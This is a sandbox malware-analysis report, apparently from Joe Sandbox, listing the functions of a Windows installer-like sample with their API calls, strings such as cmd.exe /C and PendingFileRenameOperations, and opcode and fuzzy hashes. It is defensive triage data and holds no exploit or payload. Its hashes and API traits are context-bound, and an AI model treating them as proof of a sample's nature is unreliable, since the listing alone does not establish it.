                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                            • API String ID: 3256987805-3653653586
                                                                                                                            • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                                            • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                                                            • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                                            • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041321B Relevance: 14.6, APIs: 6, Strings: 2, Instructions: 633COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LongWindow$Prop
                                                                                                                            • String ID: 3A$yA
                                                                                                                            • API String ID: 3887896539-3278460822
                                                                                                                            • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                                            • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                                                            • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                                            • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00467180 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 141windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2915 4672d0-4672da call 47d33c 2910->2915 2916 4672df-4672e3 2910->2916 2915->2916 2919 4672e5-467308 call 403738 SHGetFileInfo 2916->2919 2920 46733d-467371 call 403400 * 2 2916->2920 2919->2920 2928 46730a-467311 2919->2928 2928->2920 2931 467313-467338 ExtractIconA call 4670c0 2928->2931 2931->2920 2932->2920
                                                                                                                            APIs
                                                                                                                            • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                                              • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                                                              • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                                                            • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                                            • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                                            • String ID: c:\directory$shell32.dll$%H
                                                                                                                            • API String ID: 3376378930-166502273
                                                                                                                            • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                                            • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                                                            • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                                            • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042F560 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90windowregistryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetActiveWindow.USER32 ref: 0042F58F
                                                                                                                            • GetFocus.USER32 ref: 0042F597
                                                                                                                            • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                                                            • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                                            • String ID: TWindowDisabler-Window
                                                                                                                            • API String ID: 3167913817-1824977358
                                                                                                                            • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                                            • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                                                            • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                                            • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004531F0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                            • API String ID: 1646373207-2130885113
                                                                                                                            • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                                            • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                                                            • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                                            • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00430940 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                                            • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                                            • API String ID: 4130936913-2943970505
                                                                                                                            • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                                            • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                                                            • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                                            • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00455010 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                                                              • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                                              • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                                              • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                                              • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                                                            • API String ID: 854858120-615399546
                                                                                                                            • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                                            • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                                                            • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                                            • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042368C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                                            • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                                            • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                            • String ID: 2$MAINICON
                                                                                                                            • API String ID: 3935243913-3181700818
                                                                                                                            • Opcode ID: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                                                                            • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                                                            • Opcode Fuzzy Hash: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                                                                            • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00418F38 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                                                              • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                                                              • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                                              • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                                              • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                                              • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                                              • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                                              • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                                              • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                                              • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                                              • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                                              • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                                              • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                                                            • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                                            • API String ID: 316262546-2767913252
                                                                                                                            • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                                            • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                                                            • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                                            • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041363C Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LongWindow$Prop
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3887896539-0
                                                                                                                            • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                                            • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                                                            • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                                            • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004556D8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                                                            Strings
                                                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                                                            • WININIT.INI, xrefs: 004557E4
                                                                                                                            • PendingFileRenameOperations, xrefs: 00455754
                                                                                                                            • PendingFileRenameOperations2, xrefs: 00455784
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen
                                                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                                            • API String ID: 47109696-2199428270
